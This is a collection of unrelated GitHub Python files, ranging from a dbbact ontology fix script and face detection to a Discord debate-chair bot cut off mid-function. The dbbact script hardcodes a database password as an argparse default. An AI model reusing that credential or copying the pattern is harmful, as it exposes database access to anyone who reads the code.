+{"seq_id":"10706265044","text":"#!/usr/bin/env python\n\n'''Update the OntologyTreeStructureTable to fix the old na root term (which was undefined as contained many optional NAs)\n'''\n\nimport sys\n\nimport argparse\nimport re\nfrom collections import defaultdict\n\nimport oboparse\nimport psycopg2\n\nfrom dbbact_server import db_access\nfrom dbbact_server.utils import debug, SetDebugLevel\n\n__version__ = \"0.1\"\n\n\ndef fix_na(con, cur, commit=False):\n\t'''Update the OntologyTreeStructureTable to fix the old na root term (which was undefined as contained many optional NAs)\n\n\tParameters\n\t----------\n\tcon, cur: dbbact psycopg2 database connection and cursor\n\tcommit: bool, optional\n\t\tTrue to commit changes, False to just perform dry run\n\t'''\n\t# find the id of the dbbact ontology\n\tcur.execute('SELECT * FROM ontologynamestable WHERE description=%s', ['dbbact'])\n\tres = cur.fetchone()\n\tontologynameid = res['id']\n\tif ontologynameid != 8:\n\t\traise ValueError('strange dbbact ontologynameid: %s (instead of 8)' % ontologynameid)\n\n\t# find the dbbact root term id \"dbbact root\" (id 1811274)\n\tcur.execute('SELECT * from OntologyTable WHERE description=%s', ['dbbact root'])\n\tres = cur.fetchone()\n\tif res['term_id'] != 'dbbact:1811274':\n\t\traise ValueError('\"dbbact root\" term_id is %s instead of dbbact:1811274' % res['term_id'])\n\troot_id = res['id']\n\n\tcur.execute('SELECT * FROM OntologyTable WHERE term_id LIKE %s', ['dbbact:%'])\n\tdebug(3, 'Found %d dbbact terms' % cur.rowcount)\n\tres = cur.fetchall()\n\tnum_na_parents = 0\n\tfor cres in res:\n\t\tcur.execute('SELECT * FROM OntologyTreeStructureTable WHERE ontologyid=%s', [cres['id']])\n\t\ttres = cur.fetchall()\n\t\tfor ctres in tres:\n\t\t\tcur.execute('SELECT * FROM OntologyTable WHERE id=%s LIMIT 1', [ctres['ontologyparentid']])\n\t\t\tif cur.rowcount == 0:\n\t\t\t\tcontinue\n\t\t\tttres = cur.fetchone()\n\t\t\tif ttres['description'] == 'na':\n\t\t\t\tcur.execute('UPDATE OntologyTreeStructureTable SET ontologyparentid=%s, ontologynameid=%s WHERE uniqueid=%s', [root_id, ontologynameid, ctres['uniqueid']])\n\t\t\t\tnum_na_parents += 1\n\tdebug(4, 'updating %d dbbact terms roots' % num_na_parents)\n\tif commit:\n\t\tcon.commit()\n\t\tdebug(3, 'commited')\n\tdebug(3, 'done')\n\n\ndef main(argv):\n\tparser = argparse.ArgumentParser(description='Update the OntologyTreeStructureTable to fix the old na root term (which was undefined as contained many optional NAs). version ' + __version__, formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\tparser.add_argument('--port', help='postgres port', default=5432, type=int)\n\tparser.add_argument('--host', help='postgres host', default=None)\n\tparser.add_argument('--database', help='postgres database', default='dbbact')\n\tparser.add_argument('--user', help='postgres user', default='dbbact')\n\tparser.add_argument('--password', help='postgres password', default='magNiv')\n\tparser.add_argument('--debug-level', help='debug level (1 for debug ... 
9 for critical)', default=2, type=int)\n\tparser.add_argument('--dry-run', help='do not commit', action='store_true')\n\targs = parser.parse_args(argv)\n\n\tSetDebugLevel(args.debug_level)\n\n\tcon, cur = db_access.connect_db(database=args.database, user=args.user, password=args.password, port=args.port, host=args.host)\n\tfix_na(con, cur, commit=not args.dry_run)\n\n\nif __name__ == \"__main__\":\n\tmain(sys.argv[1:])\n","repo_name":"amnona/dbbact-server","sub_path":"utils/fix_na.py","file_name":"fix_na.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
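The commit flag in fix_na gives a cheap dry-run mode: the UPDATEs run inside psycopg2's open transaction and are only persisted when commit=True. A minimal sketch of the same pattern, reusing the table and column names from above (connection setup omitted):

def reparent_terms(con, cur, old_parent_id, new_parent_id, commit=False):
    # parameterized UPDATE; stays uncommitted inside the open transaction
    cur.execute('UPDATE OntologyTreeStructureTable SET ontologyparentid=%s '
                'WHERE ontologyparentid=%s', [new_parent_id, old_parent_id])
    if commit:
        con.commit()    # persist the changes
    else:
        con.rollback()  # dry run: discard them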
+{"seq_id":"14964661386","text":"#googleimagesdownload -k \"\" -l 20\n\n\nimport cv2\nimport os\nimport shutil\n\norg_dir = \"dataset/01_org/\"\nface_dir = \"dataset/02_face/\"\n\ncascade_xml = \"haarcascade_frontalface_default.xml\"\n\n\ndef main():\n name_list = [filename for filename in os.listdir(org_dir) if not filename.startswith(\".\")]\n print(name_list)\n \n\n for name in name_list:\n name.replace(\" \", \"_\")\n org_char_dir = org_dir + name + \"/\"\n print(org_char_dir)\n\n face_char_dir = face_dir + name + \"/\"\n os.makedirs(face_char_dir, exist_ok=True)\n\n print(len(face_char_dir))\n\n detect_face(org_char_dir, face_char_dir)\n\ndef detect_face(org_char_dir, face_char_dir):\n image_list = os.listdir(org_char_dir)\n\n for image_file in image_list:\n \n org_image = cv2.imread(org_char_dir + image_file)\n\n if org_image is None:\n print(\"Not open:\", image_file)\n continue\n\n #convert gray_scale\n img_gs = cv2.cvtColor(org_image, cv2.COLOR_BGR2GRAY)\n \n #detect_face\n cascade = cv2.CascadeClassifier(cascade_xml)\n\n for i_mn in range(1, 7, 1):\n face_list = cascade.detectMultiScale(img_gs, scaleFactor=1.1, minNeighbors=i_mn, minSize=(200, 200))\n #if more than one_face detected, get image (64*64)\n if len(face_list ) > 0:\n for rect in face_list:\n image = org_image[rect[1]:rect[1]+rect[3], rect[0]:rect[0]+rect[2]]\n if image.shape[0] < 64 or image.shape[1] < 64:\n continue\n face_image = cv2.resize(image, (64, 64))\n\n else:\n continue\n \n\n #save face_image\n face_file_name = os.path.join(face_char_dir, \"face-\" + image_file)\n cv2.imwrite(str(face_file_name), face_image)\n\nif __name__ == \"__main__\":\n main()\n\n\n\n\n\n\n ","repo_name":"priekosukeyauchi/face_classification","sub_path":"02_face_detection.py","file_name":"02_face_detection.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"1320879076","text":"# Given an array nums of distinct integers, return all the possible permutations. You can return the answer in any order.\n\n\ndef backtracking(nums, arr, answers):\n if len(nums) == 0: \n answers.append(list(arr)) \n\n for i in range(0 , len(nums)):\n arr.append(nums[i])\n backtracking(nums[:i] + nums[i+1:], arr, answers) \n arr.pop() \n\ndef permute(nums):\n if len(nums) == 0:\n return answers\n \n arr = list()\n answers = list()\n\n backtracking(nums, arr, answers)\n \n return answers\n\n\nprint(permute([1,2,3])) # Output: [[1,2,3],[1,3,2],[2,1,3],[2,3,1],[3,1,2],[3,2,1]]\nprint(permute([0,1])) # Output: [[0,1],[1,0]]\nprint(permute([1])) # Output: [[1]]","repo_name":"YaraHorany/Programming-Challenges","sub_path":"Permutations.py","file_name":"Permutations.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"25363969960","text":"import pickle\nimport numpy as np\nimport random\n\n\n# Load the trained model from the pickle file\nwith open(\"C:/Users/habibars/Downloads/Network monitoring/intrusion_detection/random_forest_model.pkl\", 'rb') as f:\n model = pickle.load(f)\n\n# Define the infer method\ndef infer(data):\n \n # Reshape the data to ensure it has the correct shape\n data = np.reshape(data, (1, -1))\n\n # Use the trained model to make a prediction on the input data\n prediction = model.predict(data)\n\n # Return the predicted class (e.g. \"BENIGN\" or \"Attack\")\n return prediction[0]\n\n\nif __name__ == '__main__':\n # Note: Only take input when you run the file individually \n # Generate a list of 69 random numbers between 0 and 1\n data = [random.uniform(0, 1) for _ in range(69)]\n\n prediction = infer(data)\n print(prediction)\n\n# Note: Command to run the file \"python inference.py\"\n\n\n","repo_name":"arsalanhabib01/Random-forest-model","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"20272784497","text":"import src.grpc.pb.message_pb2 as message_pb2\nfrom src.logic.handler import MessageHandler\nfrom src.logic.message_queue import MessageQueue\nfrom src.wit.wit import send_text\nimport src.grpc.pb.message_pb2_grpc as message_pb2_grpc\n\n\nclass MessageServicer(message_pb2_grpc.MessageServicer):\n\n def SingleRequest(self, request, context):\n wit_response = send_text(request.body)\n try:\n response = MessageHandler(wit_response, request.client_type).handle_message()\n except Exception as e:\n print(e)\n return message_pb2.Success(success=False)\n MessageQueue.add(response, request.client_type)\n return message_pb2.Success(success=True)\n\n def StreamRequest(self, request_iterator, context):\n while True:\n while MessageQueue.get_length() > 0:\n response, client_type = MessageQueue.get_first()\n yield message_pb2.MessageResponse(body=response.text, client_type=client_type)\n","repo_name":"nloetkemann/Lilly","sub_path":"Server/src/grpc/message_service.py","file_name":"message_service.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"37331005416","text":"books = [\"Learn You a Haskell\", \n \"The Healthy Programmer\",\n \"Code Complete\",\n \"The Pragmatic Programmer\",\n \"Pro Git\",\n \"Introduction to Algorithms\",\n \"Concrete Mathematics\"]\nindex = 0\n\nwhile index < len(books):\n\tprint(books[index])\n\tindex += 1","repo_name":"presian/HackBulgaria","sub_path":"Programming0-1/Week_2/2-List-Problems/while_traverse.py","file_name":"while_traverse.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"9863334712","text":"import numpy as np\nfrom wave_1d_fd_pml.propagators import Pml2\n\nclass Rtm(object):\n def __init__(self, dx, dt=None, pml_width=10, profile=None):\n self.dx = dx\n self.dt = dt\n self.pml_width = pml_width\n self.profile = profile\n\n def migrate_shot(self, model, source, source_x, receivers, receivers_x,\n imaging_condition_interval=1, ):\n assert source.ndim == 1\n assert receivers.ndim == 2\n source = source[np.newaxis, :]\n source_x = np.array([source_x])\n num_imaging_steps = int((receivers.shape[1] - 1) / imaging_condition_interval)\n\n prop = Pml2(model, self.dx, self.dt, self.pml_width, self.profile)\n nx = len(model)\n\n source_snapshots = self._forward_source(source, source_x,\n imaging_condition_interval,\n num_imaging_steps, prop, nx)\n\n image = self._backward_receivers(receivers, receivers_x,\n imaging_condition_interval,\n num_imaging_steps,\n source_snapshots, prop, nx)\n\n return image\n\n def _forward_source(self, source, source_x,\n imaging_condition_interval,\n num_imaging_steps, prop, nx):\n\n source_snapshots = np.zeros([num_imaging_steps, nx], np.float32)\n for imaging_step in range(0, num_imaging_steps):\n start_time_step = imaging_step * imaging_condition_interval\n end_time_step = start_time_step + imaging_condition_interval\n if end_time_step < source.shape[1]:\n source_snapshots[imaging_step, :] = \\\n prop.step(imaging_condition_interval,\n source[:, start_time_step:end_time_step],\n source_x)\n elif start_time_step < source.shape[1]:\n remaining_source_steps = source.shape[1] - start_time_step\n steps_after_source = (imaging_condition_interval -\n remaining_source_steps)\n prop.step(remaining_source_steps,\n source[:, start_time_step:],\n source_x)\n source_snapshots[imaging_step, :] = \\\n prop.step(steps_after_source)\n else:\n source_snapshots[imaging_step, :] = \\\n prop.step(imaging_condition_interval)\n\n return source_snapshots\n\n def _backward_receivers(self, receivers, receivers_x,\n imaging_condition_interval,\n num_imaging_steps,\n source_snapshots, prop, nx):\n\n image = np.zeros([nx], np.float32)\n for imaging_step in range(num_imaging_steps - 1, -1, -1):\n start_time_step = (imaging_step + 2) * imaging_condition_interval - 1\n end_time_step = start_time_step - imaging_condition_interval\n if start_time_step >= receivers.shape[1]:\n start_time_step = receivers.shape[1] - 1\n receiver_snapshot = \\\n prop.step(start_time_step - end_time_step,\n receivers[:, start_time_step:end_time_step:-1],\n receivers_x)\n image += (source_snapshots[imaging_step, :] *\n receiver_snapshot[:] * imaging_condition_interval)\n\n return image\n\n def model_shot(self, model, source, source_x, receivers_x, max_time):\n assert source.ndim == 1\n source = source[np.newaxis, :]\n source_x = np.array([source_x])\n num_receivers = len(receivers_x)\n\n prop = Pml2(model, self.dx, self.dt, self.pml_width, self.profile)\n\n nt = int(max_time / self.dt)\n receivers = np.zeros([num_receivers, nt], np.float32)\n for step in range(nt):\n wavefield = prop.step(1,\n source[:, step:step+1],\n source_x)\n receivers[:, step] = wavefield[receivers_x]\n\n return receivers\n","repo_name":"ar4/rtm_1d","sub_path":"rtm_1d/rtm.py","file_name":"rtm.py","file_ext":"py","file_size_in_byte":4234,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"40052292714","text":"import sys\nimport datetime\nimport pandas as pd\nfrom scipy import stats\n\ndef calc_zscore(df, name):\n try:\n zscore = stats.zscore(df.ix[:, 1])\n df[5] = zscore\n except TypeError:\n print(\"TypeError: \" + name)\n return df\n\ndef add_zcore(filename):\n try:\n df = pd.read_table(filename, header=None)\n scored_df = calc_zscore(df, filename)\n scored_df.to_csv(filename, header=None, index=None, sep=\"\\t\")\n except pd.parser.CParserError:\n print(\"ParseError: \" + filename)\n\ndef main(args):\n try:\n yyyymmdd = args.pop(1)\n if yyyymmdd == \"today\":\n yyyymmdd = datetime.date.today().strftime('%Y%m%d')\n except IndexError:\n d = datetime.date.today() - datetime.timedelta(days=1)\n yyyymmdd = d.strftime('%Y%m%d')\n\n filename = \"/home/fluent/.fluent/log/hotnews_\" + yyyymmdd + \".txt\"\n add_zcore(filename)\n\nif __name__ == '__main__':\n argsmin = 0\n version = (3, 0)\n if sys.version_info > (version):\n if len(sys.argv) > argsmin:\n sys.exit(main(sys.argv))\n else:\n print(\"This program needs at least %(argsmin)s arguments\" %\n locals())\n else:\n print(\"This program requires python > %(version)s\" % locals())\n","repo_name":"id774/hotnews","sub_path":"zscore_daily.py","file_name":"zscore_daily.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"20594812551","text":"# https://leetcode.com/problems/roman-to-integer/\n# Input: s = \"MCMXCIV\"\n# Output: 1994\n# Explanation: M = 1000, CM = 900, XC = 90 and IV = 4.\n\n# Symbol Value\n# I 1\n# V 5\n# X 10\n# L 50\n# C 100\n# D 500\n# M 1000\nimport roman as roman\n\n\nclass Solution:\n\n\n def romanToInt(self, s: str) -> int:\n rule_add = {\n 'I': 1,\n 'V': 5,\n 'X': 10,\n 'L': 50,\n 'C': 100,\n 'D': 500,\n 'M': 1000\n }\n\n rule_div = {\n ('I', 'V'): 3,\n ('I', 'X'): 8,\n ('X', 'L'): 30,\n ('X', 'C'): 80,\n ('C', 'D'): 300,\n ('C', 'M'): 800\n }\n number = 0\n prev_l = None\n for l in s:\n if prev_l and rule_add[l] > rule_add[prev_l]:\n number += rule_div[(prev_l, l)]\n print(number)\n else:\n number += rule_add[l]\n print(number)\n prev_l = l\n return number\n\n\n if __name__ == '__main__':\n s = 'MCMXCIV'\n f = romanToInt('self', s)\n\n","repo_name":"yention/codewar","sub_path":"leetcode/RomanToInt.py","file_name":"RomanToInt.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"349791859","text":"import json\n\n# entire database class with all the functions\nclass MyDb:\n def __init__(self, dbName):\n self.fileName = dbName + \".json\"\n self.json = self.loadDatabase()\n self.collection = \"\"\n def loadDatabase(self):\n with open(self.fileName) as file:\n return json.load(file)\n\n def saveDatabase(self):\n with open(self.fileName, \"w\") as file:\n file.write(json.dumps(self.json, indent=4)) \n\n def changeCollection(self, nameOfCol):\n try:\n self.json[nameOfCol]\n except KeyError:\n print(\"This collection is not in database, preparing collection.\")\n self.json[nameOfCol] = []\n \n self.collection = nameOfCol\n def getAll(self):\n return self.json[self.collection]\n def find(self, query):\n key = list(query.keys())[0]\n for obj in self.json[self.collection]:\n if obj[key] == query[key]:\n return obj\n\n def create(self, obj):\n highestId = 0\n for user in self.json[self.collection]:\n if user[\"id\"] >= highestId:\n highestId = user[\"id\"] \n highestId += 1\n obj[\"id\"] = highestId\n self.json[self.collection].append(obj)\n self.saveDatabase()\n return obj\n \n def delete(self, query):\n key = list(query.keys())[0]\n for obj in self.json[self.collection]:\n if obj[key] == query[key]:\n self.json[self.collection].remove(obj)\n self.saveDatabase()\n return True \n return False\n\n def update(self, query, updateObj):\n queryKey = list(query.keys())[0]\n updateKey = list(updateObj.keys())[0]\n for obj in self.json[self.collection]:\n if obj[queryKey] == query[queryKey]:\n obj[updateKey] == updateObj[updateKey]\n self.saveDatabase()\n return obj \n return False\n\ndef main():\n db = MyDb(\"users\")\n db.changeCollection(\"prizemi\")\n name = input(\"Name: \")\n print(db.getAll())\n user = db.create({\"name\": name})\n print(db.getAll())\n\nif __name__ == '__main__':\n main() \n","repo_name":"HollowFalls/retirement-product","sub_path":"myPyDb.py","file_name":"myPyDb.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"10773477298","text":"import os\nimport subprocess\nimport tempfile\nfrom pprint import pformat\nfrom src.cpp_builder import CPPBuilder, compile_cpp_module\n\n\ndef get_test_stdout(root_node, compile_only=False):\n source_path = tempfile.mktemp(dir=\"/tmp\", prefix=\"drake_test\", suffix=\".cpp\")\n header_path = source_path.replace('.cpp', '.hpp')\n exe_path = source_path.replace('.cpp', '')\n\n with CPPBuilder(c=source_path, h=header_path) as builder:\n root_node.to_cpp(builder)\n\n print(\"\\nCPP header file:\\n\", open(header_path).read())\n print(\"\\nCPP source file:\\n\", open(source_path).read())\n\n compile_cpp_module([ source_path ], exe_path)\n\n if compile_only:\n return None\n\n output = subprocess.check_output(exe_path)\n output = output.decode('utf-8').strip()\n\n return output\n","repo_name":"programWhiz/drake","sub_path":"tests/test_hl_ast/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"2746996203","text":"# main.py\nfrom collections import namedtuple\nfrom datetime import datetime\nfrom functools import partial\nfrom collections import defaultdict\n\n\nfile_name = './nyc_parking_tickets_extract.csv'\n\nwith open(file_name) as f:\n column_headers = next(f).strip('\\n').split(',')\n sample_data = next(f).strip('\\n').split(',')\n\nprint(column_headers)\nprint(sample_data)\n\ncolumn_names = [header.replace(' ','_').lower() for header in column_headers]\nprint(column_names)\nprint(list(zip(column_names, sample_data)))\nTicket = namedtuple('Ticket',column_names)\n\n# with open(file_name) as f:\n# next(f)\n# raw_data_row = next(f)\n#\n#\n# print([raw_data_row])\ndef read_data():\n with open(file_name) as f:\n next(f)\n yield from f\nraw_data = read_data()\n\ndef parse_int(value, *, default=None):\n try:\n return int(value)\n except ValueError:\n return default\n\n\n# print(parse_int('test', default='not an interger'))\n#\n# print(parse_int(10, default='not an integer'))\n\ndef parse_date(value, *, default=None):\n date_format = '%m/%d/%Y'\n try:\n return datetime.strptime(value, date_format).date()\n except ValueError:\n return default\n\n\n# print(parse_int('hello', default='N/A'))\n# print(parse_date('3/28/2018'))\n# print(parse_date('231212', default='N/A'))\n\ndef parse_string(value, *, default=None):\n try:\n cleaned = value.strip()\n if not cleaned:\n return default\n else:\n return cleaned\n except ValueError:\n return default\n\n\n# print(parse_string(' helllo '))\n# print(parse_string(' ', default='N/A'))\n\ncolumn_parsers = (parse_int,\n parse_string,\n lambda x: parse_string(x, default=''),\n partial(parse_string, default=''),\n parse_date,\n parse_int,\n partial(parse_string, default=''),\n parse_string,\n lambda x: parse_string(x, default='')\n )\n\n\ndef parse_row(row, *, default=None):\n fields = row.strip('\\n').split(',')\n parsed_data = [func(field)\n for func, field in zip(column_parsers, fields)]\n # return parsed_data\n if all(item is not None for item in parsed_data):\n return Ticket(*parsed_data)\n else:\n return default\nrows = read_data()\n\n\nprint('-------')\nfor _ in range(5):\n row = next(rows)\n parsed_data = parse_row(row)\n print(parsed_data)\n\n\nfor row in read_data():\n parsed_row = parse_row(row)\n if parsed_row is None:\n print(list(zip(column_names, row.strip('\\n').split(','))), end='\\n\\n')\n\n\ndef parsed_data():\n for row in read_data():\n parsed = parse_row(row)\n if parsed:\n yield parsed\nparsed_rows = parsed_data()\n\n\n# for _ in range(5):\n# print(next(parsed_rows))\n\n\ndef violation_count_by_make():\n makes_counts = defaultdict(int)\n for data in parsed_data():\n makes_counts[data.vehicle_make] += 1\n\n return {make: cnt\n for make, cnt in sorted(makes_counts.items(),\n key=lambda t: t[1],\n reverse=True)}\n\n\nprint(violation_count_by_make())","repo_name":"elmi-elmi/dD-pr6-demo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"6106144375","text":"import discord\r\nimport time\r\nimport asyncio\r\nfrom discord import FFmpegPCMAudio\r\nfrom collections import defaultdict\r\nfrom discord.ext import commands, tasks\r\nfrom discord.utils import get\r\nfrom youtube_dl import YoutubeDL\r\nclass Chair(commands.Cog):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n self.session={}\r\n self.delegate=self.bot.get_cog('Delegate')\r\n self.general_speakers={}\r\n self.player={}\r\n self.register = defaultdict(dict)\r\n \r\n @commands.has_role('Chair')\r\n @commands.command(brief='Starts a session.', description='Enables all commands for a session and invites bot to voice channel.')\r\n async def startSession(self, ctx):\r\n self.session[ctx.guild.id]=True\r\n if self.delegate is not None:\r\n self.delegate.session[ctx.guild.id]=True\r\n self.delegate.general_speakers[ctx.guild.id]=[]\r\n else:\r\n t=[]\r\n self.general_speakers[ctx.guild.id]=t\r\n self.register[ctx.guild.id]={}\r\n connected = ctx.author.voice\r\n if connected:\r\n voice_client = get(ctx.bot.voice_clients, guild=ctx.guild)\r\n if voice_client and voice_client.is_connected():\r\n embedVar = discord.Embed(title=\"Error\", description=\"Bot is already in VC. Please disconnect bot from VC and try again.\", color=discord.Color.from_rgb(78,134,219))\r\n await ctx.channel.send(embed=embedVar)\r\n \r\n else:\r\n await connected.channel.connect() \r\n await ctx.channel.send(\"Session has started!\")\r\n else:\r\n embedVar = discord.Embed(title=\"Error\", description=\"Please join a voice channel.\", color=discord.Color.from_rgb(78,134,219))\r\n await ctx.send(embed=embedVar)\r\n @startSession.error\r\n async def startSession_error(c,ctx, error):\r\n if isinstance(error, commands.MissingRole):\r\n embedVar = discord.Embed(title=\"Error\", description=\"The 'Chair' role is required to run this command.\", color=discord.Color.from_rgb(78,134,219))\r\n await ctx.send(embed=embedVar)\r\n @commands.has_role('Chair')\r\n @commands.command(brief='Ends the current Session.', description='Disables session commands and disconnects bot from voice channel.\\n Clears GS list.')\r\n async def endSession(self, ctx):\r\n self.session[ctx.guild.id]=False\r\n if self.delegate is not None:\r\n self.delegate.session[ctx.guild.id]=False\r\n self.delegate.general_speakers[ctx.guild.id]=[]\r\n \r\n connected = ctx.author.voice\r\n if connected:\r\n server=ctx.message.guild.voice_client\r\n await server.disconnect()\r\n await ctx.channel.send(\"Session has ended!\")\r\n \r\n @commands.has_role('Chair') \r\n @commands.command(brief='View the general speakers list.', description='Prints out the current general speakers list.')\r\n async def GS(self, ctx):\r\n if self.session[ctx.guild.id]==True:\r\n embedVar = discord.Embed(title=\"General Speakers List\", description=\"General Speakers.\", color=discord.Color.from_rgb(78,134,219))\r\n t=''\r\n if self.bot.get_cog('Delegate').general_speakers[ctx.guild.id]==[]:\r\n embedVar = discord.Embed(title=\"General Speakers List\", description=\"This list is empty.\", color=discord.Color.from_rgb(78,134,219))\r\n await ctx.channel.send(embed=embedVar)\r\n else:\r\n for country in self.bot.get_cog('Delegate').general_speakers[ctx.guild.id]:\r\n t=t+country+'\\n'\r\n embedVar.add_field(name=\"Countries:\", value=t, inline=False)\r\n \r\n await ctx.channel.send(embed=embedVar)\r\n \r\n @commands.has_role('Chair') \r\n @commands.command(brief='Removes first delegate from general speakers list.', description='Remove first delegate from general 
speakers list.\\n Used just after a speaker has finished.')\r\n async def popGS(self, ctx):\r\n if self.session[ctx.guild.id]==True:\r\n if self.bot.get_cog('Delegate').general_speakers[ctx.guild.id]==[]:\r\n embedVar = discord.Embed(title=\"Error\", description=\"List is empty.\", color=discord.Color.from_rgb(78,134,219))\r\n await ctx.channel.send(embed=embedVar) \r\n else:\r\n t=self.bot.get_cog('Delegate').general_speakers[ctx.guild.id][0]\r\n self.bot.get_cog('Delegate').general_speakers[ctx.guild.id]=self.bot.get_cog('Delegate').general_speakers[ctx.guild.id][1:]\r\n self.general_speakers[ctx.guild.id]=self.bot.get_cog('Delegate').general_speakers[ctx.guild.id]\r\n \r\n await ctx.channel.send(str(t)+' was removed from the GS list.')\r\n \r\n\r\n\r\n @commands.has_role('Chair')\r\n @commands.command(pass_context=True,brief='Yields the floor to a delegate.', description='Needs [delegate name] [time in seconds] and starts a timer.')\r\n async def speak(self,ctx, *,args):\r\n \r\n if self.session[ctx.guild.id]==True:\r\n args=args.split(' ')\r\n u=str(args[0])\r\n try:\r\n t=int(args[1])\r\n except ValueError:\r\n embedVar = discord.Embed(title=\"Error\", description=\"Time must be a number.\", color=discord.Color.from_rgb(78,134,219))\r\n m= await ctx.channel.send(embed=embedVar)\r\n return\r\n except IndexError:\r\n embedVar = discord.Embed(title=\"Error\", description=\"Not enough arguments. Please provide Delegate and Time.\", color=discord.Color.from_rgb(78,134,219))\r\n m= await ctx.channel.send(embed=embedVar)\r\n return\r\n await ctx.send(u+\" has the floor!\")\r\n def check(message):\r\n return message.channel == ctx.channel and message.author == ctx.author and message.content.lower() == \"cancel\"\r\n try:\r\n m = await self.bot.wait_for(\"message\", check=check, timeout=(t-10))\r\n await ctx.send(\"Cancelled\")\r\n except asyncio.TimeoutError:\r\n await ctx.send(\"10 seconds left, \"+u)\r\n try:\r\n m = await self.bot.wait_for(\"message\", check=check, timeout=(10))\r\n await ctx.send(\"Cancelled\")\r\n except asyncio.TimeoutError:\r\n await ctx.send(\"Time is up, \"+u+'!')\r\n \r\n @commands.has_role('Chair')\r\n @commands.command(pass_context=True,brief='Proposes a caucus.', description='requires [type].\\n If type is mod, structure is !propose mod [total time in min] [speakers time in sec] [country proposed] [topic].\\n If other type, requires [type] [total time in min] [country proposed].')\r\n async def propose(self, ctx,*,args):\r\n if self.session[ctx.guild.id]==True:\r\n args=args.split(' ')\r\n type=args[0]\r\n if type=='mod':\r\n try:\r\n total=int(args[1])\r\n speaking=int(args[2])\r\n except ValueError:\r\n embedVar = discord.Embed(title=\"Error\", description=\"Time must be a number.\", color=discord.Color.from_rgb(78,134,219))\r\n m= await ctx.channel.send(embed=embedVar)\r\n country=args[3]\r\n topic=' '.join(word for word in args[4:])\r\n embedVar = discord.Embed(title=\"Proposal\", description=\"A motion has been proposed.\", color=discord.Color.from_rgb(78,134,219))\r\n \r\n embedVar.add_field(name=\"Proposed Caucus:\", value=type, inline=False)\r\n embedVar.add_field(name=\"Topic:\", value=topic, inline=False)\r\n embedVar.add_field(name=\"Country:\", value=country, inline=False)\r\n embedVar.add_field(name=\"Speaking Time (seconds):\", value=int(speaking), inline=False)\r\n embedVar.add_field(name=\"Total Time (minutes):\", value=int(total), inline=False)\r\n m= await ctx.channel.send(embed=embedVar)\r\n await m.add_reaction(\"\\U0001F44D\")\r\n await 
m.add_reaction(\"\\U0001F44E\")\r\n else:\r\n try:\r\n total=int(args[1])\r\n except ValueError:\r\n embedVar = discord.Embed(title=\"Error\", description=\"Time must be a number.\", color=discord.Color.from_rgb(78,134,219))\r\n m= await ctx.channel.send(embed=embedVar)\r\n country=args[2]\r\n embedVar = discord.Embed(title=\"Proposal\", description=\"A motion has been proposed.\", color=discord.Color.from_rgb(78,134,219))\r\n embedVar.add_field(name=\"Proposed Caucus:\", value=type, inline=False)\r\n embedVar.add_field(name=\"Country:\", value=country, inline=False)\r\n embedVar.add_field(name=\"Total Time (minutes):\", value=int(total), inline=False)\r\n m= await ctx.channel.send(embed=embedVar)\r\n await m.add_reaction(\"\\U0001F44D\")\r\n await m.add_reaction(\"\\U0001F44E\")\r\n @commands.has_role('Chair')\r\n @commands.command(pass_context=True,brief='Starts a moderated caucus.', description='Requires !mod [total time in min].\\n Starts a timer.')\r\n async def mod(self,ctx, *,args):\r\n url='https://www.youtube.com/watch?v=SK3g6f5jsRA'\r\n if self.session[ctx.guild.id]==True:\r\n args=args.split(' ')\r\n try:\r\n t=int(args[0])\r\n except ValueError:\r\n embedVar = discord.Embed(title=\"Error\", description=\"Time must be a number.\", color=discord.Color.from_rgb(78,134,219))\r\n m= await ctx.channel.send(embed=embedVar)\r\n return\r\n await ctx.send(\"The Mod has started!\")\r\n def check(message):\r\n return message.channel == ctx.channel and message.author == ctx.author and message.content.lower() == \"cancel\"\r\n try:\r\n m = await self.bot.wait_for(\"message\", check=check, timeout=t*60)\r\n await ctx.send(\"mod cancelled\")\r\n except asyncio.TimeoutError:\r\n await ctx.send(f\"Mod is over!\")\r\n \r\n voice_client=ctx.guild.voice_client\r\n YDL_OPTIONS = {\r\n 'format': 'bestaudio',\r\n 'postprocessors': [{\r\n 'key': 'FFmpegExtractAudio',\r\n 'preferredcodec': 'mp3',\r\n 'preferredquality': '192',\r\n }],\r\n 'outtmpl': 'song.%(ext)s',\r\n }\r\n with YoutubeDL(YDL_OPTIONS) as ydl:\r\n ydl.download([url])\r\n voice_client.play(FFmpegPCMAudio(\"song.mp3\"))\r\n voice_client.is_playing()\r\n \r\n \r\n \r\n @commands.has_role('Chair')\r\n @commands.command(pass_context=True,brief='Starts a unmoderated caucus.', description='Requires !unmod [total time in min].\\n Starts a timer.')\r\n async def unmod(self,ctx, *,args):\r\n url='https://www.youtube.com/watch?v=SK3g6f5jsRA'\r\n if 